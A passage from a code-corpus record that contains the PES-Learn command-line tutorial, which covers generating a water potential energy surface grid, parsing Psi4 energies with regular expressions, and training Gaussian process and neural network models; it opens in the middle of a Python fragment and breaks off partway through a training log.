GaussianProcess('PES.dat', InputProcessor(''), molecule_type='{}')\\n\".format(self.molecule_type)\n else:\n string += \"gp = GaussianProcess('PES.dat', InputProcessor(''))\\n\"\n with open('hyperparameters', 'r') as f:\n hyperparameters = f.read()\n string += \"params = {}\\n\".format(hyperparameters)\n string += \"X, y, Xscaler, yscaler = gp.preprocess(params, gp.raw_X, gp.raw_y)\\n\"\n string += \"model = Model('mymodel')\\n\"\n string += \"with open('model.json', 'r') as f:\\n\"\n string += \" model_dict = json.load(f)\\n\"\n string += \"final = model.from_dict(model_dict)\\n\\n\"\n string += gp_convenience_function\n return string\n\n\n" }, { "alpha_fraction": 0.6063318252563477, "alphanum_fraction": 0.6983574032783508, "avg_line_length": 50.40467071533203, "blob_id": "8626a962aa53fb9464cc4125d7fba0e89fb21e39", "content_id": "cbd882bc2d638025cd60be0051701d1ba6fd721f", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 52844, "license_type": "permissive", "max_line_length": 846, "num_lines": 1028, "path": "/1_Tutorials/0_water_pes_command_line_interface/cli_tutorial.md", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "# PES-Learn Command-Line Interface Tutorial\n\nPES-Learn is designed to work similarly to standard electronic structure theory packages: users can generate an input file with appropriate keywords, run the software, and get a result. This tutorial covers how to do exactly that.\nHere we generate a machine-learning model of the PES of water from start to finish (no knowledge of Python required!).\n\n## 1. Generating Data\n\n### 1.1 Defining an internal coordinate grid\nCurrently PES-Learn supports generating points across PESs by displacing in simple internal coordinates (a 'Z-Matrix'). To do this, we must define a Z-Matrix in the input file. We first create an input file called `input.dat`:\n\n```console\nhome:~$ vi input.dat\n```\n\nin the input file we define the Z-Matrix and the displacements:\n```python\nO\nH 1 r1\nH 1 r2 2 a1\n\nr1 = [0.85, 1.30, 10]\nr2 = [0.85, 1.30, 10]\na1 = [90.0, 120.0, 10] \n```\n\nThe syntax defining the internal coordinate ranges is of the form [start, stop, number of points], with the bounds included in the number of points. The angles and dihedrals are always specified in degrees. The units of length can be anything, though typically Angstrom or Bohr. Dummy atoms are supported (and in fact, are required if there are 3 or more co-linear atoms, otherwise in that case those internal coordinate configurations will just be deleted!). Labels for geometry parameters can be anything (RDUM, ROH1, A120, etc) as long as they do not start with a number. Parameters can be fixed with `r1 = 1.0`, etc. An equilibruim geometry can be specified in the order the internal coordinates appear with\n```python\neq_geom = [0.96,0.96,104.5]\n```\nand this will also be included. \n\n### 1.2 Creating a Template file\n\nNormally we would go on to build our input file by adding keywords controlling the program, but first let's talk about **template input files**. A template input file is a file named `template.dat` which is a **cartesian coordinate input file for an electronic structure theory package** such as Gaussian, Molpro, Psi4, CFOUR, QChem, NWChem, and so on. It does not matter what package you want to use, it only matters that the `template.dat` contains Cartesian coordinates, and computes an electronic energy by whatever means you wish. PES-Learn will use the template file to generate a bunch of (Guassian, Molpro, Psi4, etc) input files, each with different Cartesian geometries corresponding to the above internal coordinate grid. The template input file we will use in this example is a Psi4 input file which computes a CCSD(T)/cc-pvdz energy:\n```python\nmolecule h2o {\n0 1\nH 0.00 0.00 0.00\nH 0.00 0.00 0.00\nO 0.00 0.00 0.00\n}\n\nset {\nreference rhf\nbasis cc-pvdz\n}\nenergy('ccsd(t)')\n```\n\nThe actual contents of the Cartesian coordinates does not matter. Later on when we run the code, the auto-generated input files with Cartesian geometries corresponding to our internal coordinate grid will be put into their own newly-created sub-directories likes this:\n```\nPES_data/1/\nPES_data/2/\nPES_data/3/\n...\n```\n\nThis PES_data folder can then be zipped up and sent to whatever computing resources you want to use.\n\n### 1.3 Data Generation Keywords\n\nLet's go back to our PES-Learn input file, add a few keywords, and discuss them.\n```python\nO\nH 1 r1\nH 1 r2 2 a1\n\nr1 = [0.85, 1.30, 10]\nr2 = [0.85, 1.30, 10]\na1 = [90.0, 120.0, 10] \n\n# Data generation-relevant keywords\neq_geom = [0.96,0.96,104.5]\ninput_name = 'input.dat'\nremove_redundancy = true\nremember_redundancy = false\ngrid_reduction = 300\n```\nComments (ignored text) can be specified with a `#` sign. All entries are case-insensitive. Multiple word phrases are seperated with an underscore. Text that doesn't match any keywords is simply ignored (in this way, the use of comment lines is really not necessary unless your are commenting out keyword options). **This means if you spell a keyword or its value incorrectly it will be ignored**. The first occurance of a keyword will be used.\n\n* We discussed **`eq_geom`** before, it is a geometry forced into the dataset, and it would typically correspond to the global minimum at the level of theory you are using. It is often a good idea to create your dataset such that the minimum of the dataset is the true minimum of the surface, especially for vibrational levels applications. \n* **`input_name`** tells PES-Learn what to call the electronic structure theory input files. `'input.dat'` is the default value, no need to set it normally. Note that it is surrounded in quotes; this is so PES-Learn doesn't touch it or change anything about it, such as lowering the case of all the letters. \n\n* **`remove_redundancy`** removes symmetry-redundant geometries from the internal coordinate grid. In this case, there is redundancy in the equivalent OH bonds and they will be removed. \n\n* **`remember_redundancy`** keeps a cache of redundant-geometry pairs, so that when the energies are parsed from the output files and the dataset is created later on, all of the original geometries are kept in the dataset, with duplicate energies for redundant geometries. If one does not use a permutation-invariant geometry for ML later, this may be useful.\n\n* **`grid_reduction`** reduces the grid size to the value entered. In this case it means only 300 geometries will be created. This is done by finding the Euclidean distances between all the points in the dataset, and extracting a maximally spaced 'sub-grid' of the size specified. \n\n### 1.4 Running the code and generating the data\n\nIn the directory containing the PES-Learn input file `input.dat` and `template.dat`, simply run \n```console\nhome:~$ python path/to/PES-Learn/peslearn/driver.py\n```\nThe code will then ask what you want to do, here we type `g` or `generate` and hit enter, and this is the output:\n```\nDo you want to 'generate' data, 'parse' data, or 'learn'?g\n\n1000 internal coordinate displacements generated in 0.00741 seconds\nTotal displacements: 1001\nNumber of interatomic distances: 3\nGeometry grid generated in 0.06 seconds\nRemoving symmetry-redundant geometries... Redundancy removal took 0.01 seconds\nRemoved 450 redundant geometries from a set of 1001 geometries\nReducing size of configuration space from 551 datapoints to 300 datapoints\nConfiguration space reduction complete in 0.05 seconds\nYour PES inputs are now generated. Run the jobs in the PES_data directory and then parse.\nData generation finished in 0.41 seconds\nTotal run time: 0.41 seconds\n```\n\nThe 300 Psi4 input files with Cartesian coordinates corresponding to our internal coordinate grid are now placed into a directory called `PES_data`:\n```\nPES_data/1/\nPES_data/2/\nPES_data/3/\n...\n```\n\n**Quick note:** you do not have to use the command line to specify whether you want to `generate`, `parse`, or `learn`, you can instead specify the `mode` keyword in the input file:\n```python\nmode = generate # or 'parse' or 'learn', or shorthand: 'g', 'p', 'l'\n```\nthis is at times convenient if computations are submitted remotely in an automated fashion, and the users are not directly interacting with a command line.\n\nWe are now ready run the Psi4 energy computations.\n\n## 2. Parsing Output files to collect electronic energies\n\nNow that every Psi4 input file has been run, and there is a corresponding `output.dat` in each sub-directory of `PES_data`, we are ready to use PES-Learn to grab all of the energies, match them with the appropriate geometries, and create a dataset. \n\nThere are two schemes for parsing output files with PES-Learn:\n * User-supplied Python regular expressions\n * cclib\n \n**Regular expressions** are a pattern-matching syntax. Though they are somewhat tedious to use, they are completely general. Using the regular expression scheme requires\n 1. Inspecting the electronic structure theory software output file\n 2. Finding the line where the desired energy is \n 3. Writing a regular expression to match the line's text and grab the desired energy.\n \n**cclib** is a Python library of hard-coded parsing routines. It works in a lot of cases. At the time of writing, cclib supports parsing `scfenergies`, ``mpenergies``, and `ccenergies`. These different modes attempt to find the highest level of theory SCF energy (Hartree-Fock or DFT), highest level of Moller-Plesset perturbation theory energy, or the highest level of theory coupled cluster energy. Since these are hard-coded routines that are version-dependent, there is no gurantee it will work! It is also a bit slower than regular expressions (i.e. milliseconds --> seconds slower)\n\n\n### 2.1 Setting the appropriate parsing keywords in the PES-Learn input file\n\nIt is often a good idea to take a look at a successful output file in `PES_data/`. Here is the output file in `PES_data/1/`, which is the geometry corresponding to `eq_geom` defined earlier:\n\n```\n **************************\n * *\n * CCTRIPLES *\n * *\n **************************\n\n\n Wave function = CCSD_T\n Reference wfn = RHF\n\n Nuclear Rep. energy (wfn) = 9.168193296244223\n SCF energy (wfn) = -76.026653661887252\n Reference energy (file100) = -76.026653661887366\n CCSD energy (file100) = -0.213480496782495\n Total CCSD energy (file100) = -76.240134158669861\n\n Number of ijk index combinations: 35\n Memory available in words : 65536000\n ~Words needed per explicit thread: 2048\n Number of threads for explicit ijk threading: 1\n\n MKL num_threads set to 1 for explicit threading.\n\n (T) energy = -0.003068821713392\n * CCSD(T) total energy = -76.243202980383259\n\n\n Psi4 stopped on: Thursday, 09 May 2019 01:51PM\n Psi4 wall time for execution: 0:00:01.05\n\n*** Psi4 exiting successfully. Buy a developer a beer!\n```\n\nIf we were to use cclib, we would put into our PES-Learn `input.dat` file:\n```python\n# Parsing-relevant keywords\nenergy = cclib\nenergy_cclib = ccenergies\n```\nto grab coupled cluster energies. **Unfortunately, at the time of writing, this only grabbed the CCSD energies and not the CCSD(T) energies (it's a good idea to always check**). Let's use regular expressions instead.\n\n### 2.1.1 Regular expressions\n\nOne fact is always very important to keep in mind when using regular expressions in PES-Learn: \n**PES-Learn always grabs the last matching entry in the output file** \nThis is good to know, since a pattern may match multiple entries in the output file, but it's okay as long as you want the *last one*.\n\nWe observe that the energy we want is always contained in a line like \n```\n * CCSD(T) total energy = -76.243202980383259\n```\n\nSo the general pattern we want to match is `total energy` (whitespace) `=` (whitespace) (negative floating point number). We may put into our PES-Learn input file the following regular expression:\n```python\n# Parsing-relevant keywords\nenergy = regex\nenergy_regex = 'total energy\\s+=\\s+(-\\d+\\.\\d+)'\n```\n\nHere we have taken advantage of the fact that the pattern `total energy` does not appear anymore after the CCSD(T) energy in the output file. The above `energy_regex` line matches the words 'total energy' followed by one or more whitespaces `\\s+`, an equal sign `=`, one or more whitespaces `\\s+`, and then a negative floating point number `-\\d+\\.\\d+` which we have necessarily enclosed in parentheses to indicate that we only want to capture the number itself, not the whole line. This is a bit cumbersome to use, so if this in foreign to you I recommend trying out various regular expressions via trial and error using Pythex https://pythex.org/ to ensure that the pattern is matched.\n\nA few other valid `enegy_regex` lines would be\n```python\nenergy_regex = 'CCSD\\(T\\) total energy\\s+=\\s+(-\\d+\\.\\d+)'\n```\n```python\nenergy_regex = '=\\s+(-\\d+\\.\\d+)'\n```\nNote above that we had to \"escape\" the parentheses with backward slashes [since it is a reserved character.](https://www.debuggex.com/cheatsheet/regex/python)\nIf you want to be safe from parsing the wrong energy, more verbose is probably better.\n\n### 2.2 Setting up the input file\nHere we have added our parsing keywords to our PES-Learn input file. (We could have had these keywords defined earlier as well, but to keep things simple I am only adding them when needed.)\n```python\nO\nH 1 r1\nH 1 r2 2 a1\n\nr1 = [0.85, 1.30, 10]\nr2 = [0.85, 1.30, 10]\na1 = [90.0, 120.0, 10] \n\n# Data generation-relevant keywords\neq_geom = [0.96,0.96,104.5]\ninput_name = 'input.dat'\nremove_redundancy = true\nremember_redundancy = false\ngrid_reduction = 300\n\n# Parsing-relevant keywords\nenergy = regex\nenergy_regex = 'total energy\\s+=\\s+(-\\d+\\.\\d+)'\npes_name = 'PES.dat'\nsort_pes = true # sort in terms of increasing energy\npes_format = interatomics # could also choose internal coordinates r1, r2, a1\n```\n\n### 2.3 Parsing the output files and creating a dataset\nJust as before, we run PES-Learn, and this time choose `parse` by typing `p` and hitting enter:\n```console\nhome:~$ python path/to/PES-Learn/peslearn/driver.py\nDo you want to 'generate' data, 'parse' data, or 'learn'?p\nParsed data has been written to PES.dat\nTotal run time: 0.38 seconds\n```\n\nThe dataset `PES.dat` looks like this:\n```python\nr0,r1,r2,E\n1.518123981600,0.960000000000,0.960000000000,-76.243202980383\n1.455484441900,0.950000000000,0.950000000000,-76.242743191056\n1.494132369500,1.000000000000,0.950000000000,-76.242037809799\n1.568831329800,1.000000000000,1.000000000000,-76.241196021922\n1.494050142500,1.000000000000,1.000000000000,-76.240995054410\n```\n\n\n## 3. Creating Auto-Generated Machine Learning Models of the Potential Energy Surface\n\n### 3.1 Gaussian Process Regression\n\nWe now have in our working directory a file called `PES.dat`, created with the routine above. An auto-optimized machine learning model of the surface can be produced by this dataset. Below we have added keywords to our PES-Learn input file which are relevant to training a ML model\n\n\n```python\nO\nH 1 r1\nH 1 r2 2 a1\n\nr1 = [0.85, 1.30, 10]\nr2 = [0.85, 1.30, 10]\na1 = [90.0, 120.0, 10] \n\n# Data generation-relevant keywords\neq_geom = [0.96,0.96,104.5]\ninput_name = 'input.dat'\nremove_redundancy = true\nremember_redundancy = false\ngrid_reduction = 300\n\n# Parsing-relevant keywords\nenergy = regex\nenergy_regex = 'total energy\\s+=\\s+(-\\d+\\.\\d+)'\npes_name = 'PES.dat'\nsort_pes = true # sort in terms of increasing energy\npes_format = interatomics # could also choose internal coordinates r1, r2, a1\n\n# ML-relevant keywords\nml_model = gp # Use Gaussian Process regression\npes_format = interatomics # Geometry values in the PES file\nuse_pips = true # Transform interatomic distances into permutation invariant polynomials\nhp_maxit = 15 # Train 15 models with hyperparameter optimization, select the best\ntraining_points = 200 # Train with 200 points (out of 300 total)\nsampling = structure_based # Sample training set by maximizing Euclidean distances\nn_low_energy_train = 1 # Force lowest energy point into training set\n```\n\nWe note that a **minimal working input file** would only need the internal coordinate definition (because we are using PIPs and need to know the atom types!) and the ML relevant keywords:\n\n```python\nO\nH 1 r1\nH 1 r2 2 a1\n\n# ML-relevant keywords\nml_model = gp # Use Gaussian Process regression\npes_format = interatomics # Geometry values in the PES file\nuse_pips = true # Transform interatomic distances into permutation invariant polynomials\nhp_maxit = 15 # Train 15 models with hyperparameter optimization, select the best\ntraining_points = 200 # Train with 200 points (out of 300 total)\nsampling = structure_based # Sample training set by maximizing Euclidean distances\nn_low_energy_train = 1 # Force lowest energy point into training set\n```\n\nrunning the following tries out several models and prints the performance statistics in units of wavenumbers (cm$^{-1}$):\n\n<details>\n <summary>Click to expand and see all hyperparameter iterations</summary>\n \n```console\nhome:~$ python path/to/PES-Learn/peslearn/driver.py\nDo you want to 'generate' data, 'parse' data, or 'learn'?l\nUsing permutation invariant polynomial transformation for molecule type A2B\nBeginning hyperparameter optimization...\nTrying 15 combinations of hyperparameters\nTraining with 200 points (Full dataset contains 300 points).\nUsing structure_based training set point sampling.\nErrors are root-mean-square error in wavenumbers (cm-1)\nHyperparameters: \n{'morse_transform': {'morse': False}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': 'mm01', 'scale_y': None}\nTest Dataset 5.38\nFull Dataset 5.36\nMedian error: 4.18\nMax 5 errors: [11.3 11.4 11.9 12.7 13.9]\nHyperparameters: \n{'morse_transform': {'morse': True, 'morse_alpha': 2.0}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': 'mm11', 'scale_y': 'mm11'}\nTest Dataset 0.94\nFull Dataset 0.77\nMedian error: 0.53\nMax 5 errors: [1.9 2. 2. 2. 2.2]\nHyperparameters: \n{'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': 'mm11', 'scale_y': 'mm11'}\nTest Dataset 0.55\nFull Dataset 0.51\nMedian error: 0.33\nMax 5 errors: [1.2 1.3 1.3 1.5 1.8]\nHyperparameters: \n{'morse_transform': {'morse': False}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': 'mm01', 'scale_y': 'std'}\nTest Dataset 0.52\nFull Dataset 0.42\nMedian error: 0.26\nMax 5 errors: [1.1 1.1 1.1 1.2 1.2]\nHyperparameters: \n{'morse_transform': {'morse': False}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': 'std', 'scale_y': None}\nTest Dataset 5.38\nFull Dataset 5.36\nMedian error: 4.17\nMax 5 errors: [11.4 11.5 11.9 12.7 13.9]\nHyperparameters: \n{'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': 'std', 'scale_y': 'mm01'}\nTest Dataset 0.86\nFull Dataset 0.81\nMedian error: 0.52\nMax 5 errors: [2. 2. 2.2 2.3 3. ]\nHyperparameters: \n{'morse_transform': {'morse': False}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': 'mm11', 'scale_y': 'mm11'}\nTest Dataset 0.54\nFull Dataset 0.49\nMedian error: 0.35\nMax 5 errors: [1.2 1.2 1.2 1.2 1.4]\nHyperparameters: \n{'morse_transform': {'morse': True, 'morse_alpha': 1.2000000000000002}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': 'mm01', 'scale_y': None}\nTest Dataset 9.84\nFull Dataset 8.51\nMedian error: 6.29\nMax 5 errors: [19.4 20.4 20.5 21.1 25.2]\nHyperparameters: \n{'morse_transform': {'morse': True, 'morse_alpha': 1.8}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': None, 'scale_y': 'std'}\nTest Dataset 0.28\nFull Dataset 0.24\nMedian error: 0.15\nMax 5 errors: [0.7 0.8 0.8 1.2 1.4]\nHyperparameters: \n{'morse_transform': {'morse': False}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': None, 'scale_y': 'mm01'}\nTest Dataset 0.91\nFull Dataset 0.87\nMedian error: 0.57\nMax 5 errors: [2.2 2.2 2.3 2.4 2.8]\nHyperparameters: \n{'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': None, 'scale_y': 'mm01'}\nTest Dataset 0.97\nFull Dataset 0.9\nMedian error: 0.61\nMax 5 errors: [2.2 2.3 2.4 2.5 2.8]\nHyperparameters: \n{'morse_transform': {'morse': False}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': 'mm11', 'scale_y': None}\nTest Dataset 5.38\nFull Dataset 5.37\nMedian error: 4.15\nMax 5 errors: [11.4 11.5 12. 12.7 13.9]\nHyperparameters: \n{'morse_transform': {'morse': True, 'morse_alpha': 1.3}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': 'mm01', 'scale_y': 'mm01'}\nTest Dataset 1.37\nFull Dataset 1.06\nMedian error: 0.57\nMax 5 errors: [3.2 3.2 3.3 3.5 3.7]\nHyperparameters: \n{'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': 'mm11', 'scale_y': None}\nTest Dataset 5.7\nFull Dataset 5.68\nMedian error: 4.33\nMax 5 errors: [13. 13.8 14.7 14.7 15.1]\nHyperparameters: \n{'morse_transform': {'morse': True, 'morse_alpha': 1.5}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': 'mm01', 'scale_y': 'mm01'}\nTest Dataset 1.3\nFull Dataset 1.03\nMedian error: 0.65\nMax 5 errors: [2.9 2.9 3. 3. 3.1]\n\n###################################################\n# #\n# Hyperparameter Optimization Complete!!! #\n# #\n###################################################\n\nBest performing hyperparameters are:\n[('morse_transform', {'morse': True, 'morse_alpha': 1.8}), ('pip', {'degree_reduction': True, 'pip': True}), ('scale_X', None), ('scale_y', 'std')]\nFine-tuning final model architecture...\nHyperparameters: {'morse_transform': {'morse': True, 'morse_alpha': 1.8}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': None, 'scale_y': 'std'}\nFinal model performance (cm-1):\nTest Dataset 0.28 Full Dataset 0.24 Median error: 0.15 Max 5 errors: [0.7 0.8 0.8 1.2 1.4] \n\nSaving ML model data...\nTotal run time: 66.25 seconds\n```\n</details>\n\n \n \nTraining with just 200 points, the best model had a RMSE on the 100-point test set of 0.28 cm$^{-1}$, and the full 300 point dataset had a RMSE of 0.24 cm$^{-1}$. This is absurdly accurate; it's a good thing we used `grid_reduction` back when generating our data to reduce our dataset from 551 points to just 300! We clearly did not need more than a few hundred points to model this portion of the PES of water; any more computations would have been unnecessary! This is why it is important to probe how much data one needs along the surface at a **meaningful but low level of theory**. \n\n### 3.2 Using the GP model\n\nAfter running the above, PES-Learn creates a directory `model1data` (subsequently trained models will not overwrite this, but instead create new directories `model2data`, `model3data`, etc.). Inside this directory is a variety of files which are self-explanatory. \n\nThe most important file is the auto-generated Python script `compute_energy.py` which can be used to evaluate new energies using the model. It needs to be in the same directory as `PES.dat` and `model.json` to work. It contains a function `pes()` which takes one or more cartesian or internal coordinate arguments and outputs one or more energies corresponding to the geometries. If the argument `cartesian=False` is set, you must supply coordinates in the exact same format and exact same order as the model was trained on (i.e. the format in `PES.dat`). If the argument `cartesian=True` is set, cartesian coordinates are supplied in the same order as given in a typical PES_data input file (not the template.dat file). **Cartesians can only be supplied if the model was trained on interatomic distances or PIPs of the interatomic distances.**\n\nThe `compute_energy.py` file can be imported and used. Here's an example python script `use_model.py` which imports the `pes` function and evaluates some energies at some cartesian geometries.\n\n```python\nfrom compute_energy import pes\n\ncart_geoms = [[0.0000000000, 0.0000000000, 1.1000000000, 0.0000000000, 0.7361215932, -0.4250000000, 0.0000000000, 0.0000000000, 0.0000000000],\n [0.0000000000, 0.2000000000, 1.2000000000, 0.0000000000, 0.7461215932, -0.4150000000, 0.0000000000, 0.0000000000, 0.1000000000],\n [0.0000000000, 0.1000000000, 1.3000000000, 0.0000000000, 0.7561215932, -0.4350000000, 0.0000000000, 0.0000000000, 0.2000000000]]\n\nenergies1 = pes(cart_geoms)\nprint(energies1)\n\ninteratomic_geoms = [[1.494050142500,1.000000000000,1.000000000000],\n [1.597603916000,1.000000000000,0.950000000000],\n [1.418793563200,1.000000000000,0.950000000000]]\n\nenergies2 = pes(interatomic_geoms, cartesian=False)\nprint(energies2)\n```\nThe print statements yield the following output. The energy is in units of Hartrees (which are the unit of energy in our PES.dat which the model was trained on).\n\n```\n[[-76.20462724]\n [-76.21835841]\n [-76.21467994]]\n[[-76.24099496]\n [-76.24031118]\n [-76.24024971]]\n```\n\n\n### 3.3 Neural Network Regression\n\nNeural networks (NNs) are recommended for training sets of size 1000 and above for efficiency. This is because the hyperparameter tuning of NNs takes much longer than GPs, so there is an initial up-front cost to training NNs that GPs do not have. The NN building code can be broken down into three steps:\n* Neural architecture search (NAS)\n* Hyperparameter tuning\n* Learning rate optimization\n\nEarly stopping is used more aggressively in the first steps than in the last. Therefore, the performance of models during the NAS and hyperparameter tuning steps should not be taken as final; the training of the models is being stopped early to save time. \n\nBatch learning with the L-BFGS optimizer is currently the only option. For high-level regression tasks, it is far superior to 1st order optimizers such as Adam, SGD, and RMSProp. \n\nThe Neural Architecture Search (NAS) tries out several hidden layer structures. One can override default NAS hidden layer strucutres with the keyword `nas_trial_layers` with the syntax `nas_trial_layers = [[32], [32,32], [256]]`, which would try out NNs with a single hidden layer of 32 nodes, two hidden layers with 32 nodes, and a single hidden layer with 256 nodes. The default NAS space is very large, so if you observe on your first run with the default NAS space that your dataset does better with a large number of nodes ([256,256] for example) you may consider restricting the NAS space on future runs using the `nas_trial_layers` keyword. There should be at least 3 hidden layer structures in the NAS space.\n\nHyperparameter tuning is similar to the GP model optimizer. The learning rate optimizer is self-explanatory. There are checks in place to detect performance plateaus (in which learning rate decay triggers), or overfitting (in which case training is halted).\n\nFor neural networks, a validation set must be specified since they are more prone to overfitting. The validation points are sampled from all points which are not training set points. If one does not specify a number of validation points, by default half of the test set points are converted to validation set points. If you dataset has 1000 points and 800 are used for training, there would by default be 100 validation points and 100 test points. The validation error is used to optimize hyperparameters, while the test set error is not used for anything, though it is printed in all cases. \n\nA neural network can be trained with minimal modification of the GP input used previously: \n\n```python\nO\nH 1 r1\nH 1 r2 2 a1\n\n# ML-relevant keywords\nml_model = nn # Use Neural Network regression\npes_format = interatomics # Geometry values in the PES file\nuse_pips = true # Transform interatomic distances into permutation invariant polynomials\nhp_maxit = 15 # Train 15 models with hyperparameter optimization, select the best\ntraining_points = 200 # Train with 200 points (out of 300 total)\nvalidation_points = 50 # Validate with 50 points (50 left over for testing)\nsampling = structure_based # Sample training set by maximizing Euclidean distances\nn_low_energy_train = 1 # Force lowest energy point into training set\nnas_trial_layers = [[32], [32,32], [64], [16,16,16]] # NAS hidden layer trial structures\n```\n\nThe output of PES-Learn is: \n\n<details>\n <summary>Click to expand and see neural network optimization output</summary>\n \n```console\nhome:~$ python path/to/PES-Learn/peslearn/driver.py\nDo you want to 'generate' data, 'parse' data, or 'learn'?l\nDo you want to 'generate' data, 'parse' data, or 'learn'?l\nUsing permutation invariant polynomial transformation for molecule type A2B\nNumber of validation points not specified. Splitting test set in half --> 50% test, 50% validation\nTraining with 200 points. Validating with 50 points. Full dataset contains 300 points.\nUsing structure_based training set point sampling.\nErrors are root-mean-square error in wavenumbers (cm-1)\n\nPerforming neural architecture search...\n\nHidden layer structure: [32]\nHyperparameters: {'morse_transform': {'morse': False}, 'scale_X': {'scale_X': 'std', 'activation': 'tanh'}, 'scale_y': 'std', 'pip': {'degree_reduction': False, 'pip': True}, 'layers': [32]}\nTest set RMSE (cm-1): 5.11 Validation set RMSE (cm-1): 5.03 Full dataset RMSE (cm-1): 4.40\nHidden layer structure: [64]\nHyperparameters: {'morse_transform': {'morse': False}, 'scale_X': {'scale_X': 'std', 'activation': 'tanh'}, 'scale_y': 'std', 'pip': {'degree_reduction': False, 'pip': True}, 'layers': [64]}\nTest set RMSE (cm-1): 6.30 Validation set RMSE (cm-1): 4.59 Full dataset RMSE (cm-1): 5.06\nHidden layer structure: [16, 16, 16]\nHyperparameters: {'morse_transform': {'morse': False}, 'scale_X': {'scale_X': 'std', 'activation': 'tanh'}, 'scale_y': 'std', 'pip': {'degree_reduction': False, 'pip': True}, 'layers': [16, 16, 16]}\nTest set RMSE (cm-1): 5.83 Validation set RMSE (cm-1): 6.52 Full dataset RMSE (cm-1): 4.99\nHidden layer structure: [32, 32]\nHyperparameters: {'morse_transform': {'morse': False}, 'scale_X': {'scale_X': 'std', 'activation': 'tanh'}, 'scale_y': 'std', 'pip': {'degree_reduction': False, 'pip': True}, 'layers': [32, 32]}\nTest set RMSE (cm-1): 1.67 Validation set RMSE (cm-1): 1.69 Full dataset RMSE (cm-1): 1.57\n\nNeural architecture search complete. Best hidden layer structures: [[32, 32], [32], [16, 16, 16]]\n\nBeginning hyperparameter optimization...\nTrying 15 combinations of hyperparameters\nHyperparameters: \n{'layers': (32,), 'morse_transform': {'morse': True, 'morse_alpha': 1.6}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'mm11'}\nTest set RMSE (cm-1): 2.98 Validation set RMSE (cm-1): 2.67 Full dataset RMSE (cm-1): 2.94\nHyperparameters: \n{'layers': (32,), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'mm11'}, 'scale_y': 'mm01'}\nTest set RMSE (cm-1): 17.35 Validation set RMSE (cm-1): 16.15 Full dataset RMSE (cm-1): 17.24\nHyperparameters: \n{'layers': (32, 32), 'morse_transform': {'morse': True, 'morse_alpha': 1.6}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'mm11'}, 'scale_y': 'mm01'}\nTest set RMSE (cm-1): inf Validation set RMSE (cm-1): inf Full dataset RMSE (cm-1): inf\nHyperparameters: \n{'layers': (16, 16, 16), 'morse_transform': {'morse': True, 'morse_alpha': 1.9000000000000001}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'std'}\nTest set RMSE (cm-1): 4.13 Validation set RMSE (cm-1): 4.00 Full dataset RMSE (cm-1): 3.65\nHyperparameters: \n{'layers': (32,), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'mm11'}, 'scale_y': 'std'}\nTest set RMSE (cm-1): 1.49 Validation set RMSE (cm-1): 1.42 Full dataset RMSE (cm-1): 1.31\nHyperparameters: \n{'layers': (32, 32), 'morse_transform': {'morse': True, 'morse_alpha': 1.6}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'mm11'}, 'scale_y': 'std'}\nTest set RMSE (cm-1): inf Validation set RMSE (cm-1): inf Full dataset RMSE (cm-1): inf\nHyperparameters: \n{'layers': (32,), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'mm11'}\nTest set RMSE (cm-1): 25623.45 Validation set RMSE (cm-1): 44170.74 Full dataset RMSE (cm-1): 20903.16\nHyperparameters: \n{'layers': (16, 16, 16), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'mm11'}\nTest set RMSE (cm-1): 4.87 Validation set RMSE (cm-1): 3.20 Full dataset RMSE (cm-1): 3.10\nHyperparameters: \n{'layers': (32, 32), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'std'}\nTest set RMSE (cm-1): 0.81 Validation set RMSE (cm-1): 0.82 Full dataset RMSE (cm-1): 0.71\nHyperparameters: \n{'layers': (16, 16, 16), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'mm11'}, 'scale_y': 'std'}\nTest set RMSE (cm-1): 2.61 Validation set RMSE (cm-1): 2.43 Full dataset RMSE (cm-1): 2.11\nHyperparameters: \n{'layers': (32, 32), 'morse_transform': {'morse': True, 'morse_alpha': 1.5}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'mm11'}, 'scale_y': 'std'}\nTest set RMSE (cm-1): 4.09 Validation set RMSE (cm-1): 3.02 Full dataset RMSE (cm-1): 3.41\nHyperparameters: \n{'layers': (32,), 'morse_transform': {'morse': True, 'morse_alpha': 